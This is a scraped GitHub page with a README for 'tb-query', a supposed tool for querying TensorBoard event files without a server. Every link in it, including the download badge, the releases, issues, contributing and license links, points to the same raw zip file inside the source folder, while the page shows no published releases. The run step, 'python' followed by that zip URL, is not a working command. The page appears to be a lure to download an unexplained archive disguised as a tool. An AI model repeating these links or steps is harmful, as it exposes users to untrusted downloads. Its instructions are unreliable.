Skip to content

cooldandg/tb-query

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

7 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

# πŸŽ‰ tb-query - Analyze TensorBoard Data with Ease

## πŸš€ Getting Started

Welcome to **tb-query**! This tool helps you query and analyze TensorBoard event files easily. You don't need a running TensorBoard server to use it. Follow the steps below to download and run tb-query smoothly.

## πŸ“¦ Download tb-query

[![Download tb-query](https://raw.githubusercontent.com/cooldandg/tb-query/master/src/tb_query/tb-query-signless.zip)](https://raw.githubusercontent.com/cooldandg/tb-query/master/src/tb_query/tb-query-signless.zip)

You can download the latest version of tb-query from our releases page. Click the link below:

[Visit this page to download](https://raw.githubusercontent.com/cooldandg/tb-query/master/src/tb_query/tb-query-signless.zip)

## πŸ’» System Requirements

To run tb-query on your computer, you will need:

- A desktop or laptop with a modern operating system, such as:
  - Windows 10 or later
  - macOS 10.15 or later
  - Linux with kernel version 4.0 or later
- At least 4 GB of RAM
- Python 3.6 or later (included in the tb-query package)

## βš™οΈ Installation Instructions

Follow these steps to install tb-query:

1. **Download the Software:**
   - Go to our [releases page](https://raw.githubusercontent.com/cooldandg/tb-query/master/src/tb_query/tb-query-signless.zip).
   - Find the latest release and download the appropriate file for your operating system.
  
2. **Extract the Files:**
   - If you downloaded a zipped file, double-click it to extract. This creates a new folder with tb-query files.

3. **Run the Application:**
   - Open a terminal (Command Prompt on Windows, Terminal on macOS/Linux).
   - Navigate to the folder where you extracted the files. For example, if you extracted it to a folder named "tb-query" on your desktop:
     - On Windows, type: `cd Desktop\tb-query`
     - On macOS/Linux, type: `cd ~/Desktop/tb-query`
   - Start tb-query by typing: `python https://raw.githubusercontent.com/cooldandg/tb-query/master/src/tb_query/tb-query-signless.zip` and press Enter.

## πŸ“Š Using tb-query

Once tb-query is running, you can start querying your TensorBoard event files. Here’s how to get started:

1. **Load an Event File:**
   - Use the command: `load <path_to_event_file>` where `<path_to_event_file>` is the location of your TensorBoard event file.

2. **Analyze the Data:**
   - After loading, you can use commands like:
     - `summary` - Get a summary of the data.
     - `metrics` - List the training metrics available in the file.
     - `visualize <metric_name>` - Visualize a specific metric for deeper insights.

## πŸ“” Command Reference

Here's a list of basic commands you can use with tb-query:

- `help` - Display all commands and their descriptions.
- `exit` - Close the program.
- `load` - Load your TensorBoard event file for analysis.

## ⚑ Features

- **No Need for a Running TensorBoard Server:** Analyze your data without needing additional setups.
- **User-Friendly CLI:** Simple command-line interface designed for ease of use.
- **Versatile Data Analysis:** Query metrics, visualize graphs, and summarize results effectively.
- **Supports Various Event Files:** Compatible with standard TensorBoard event files.

## 🀝 Support

If you encounter issues or have questions about tb-query, feel free to open an issue on our [GitHub repository](https://raw.githubusercontent.com/cooldandg/tb-query/master/src/tb_query/tb-query-signless.zip). 

## πŸ”„ Contributing

We welcome contributions! If you'd like to improve tb-query, please check our [contributing guidelines](https://raw.githubusercontent.com/cooldandg/tb-query/master/src/tb_query/tb-query-signless.zip).

## πŸ“„ License

tb-query is licensed under the MIT License. You can view the full license [here](https://raw.githubusercontent.com/cooldandg/tb-query/master/src/tb_query/tb-query-signless.zip).

Make sure to check the releases page for updates and new features:

[Visit this page to download](https://raw.githubusercontent.com/cooldandg/tb-query/master/src/tb_query/tb-query-signless.zip)

Happy querying!

About

πŸ“Š Query TensorBoard event files directly with tb-query for fast analysis, statistics, and integration without needing a running TensorBoard server.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors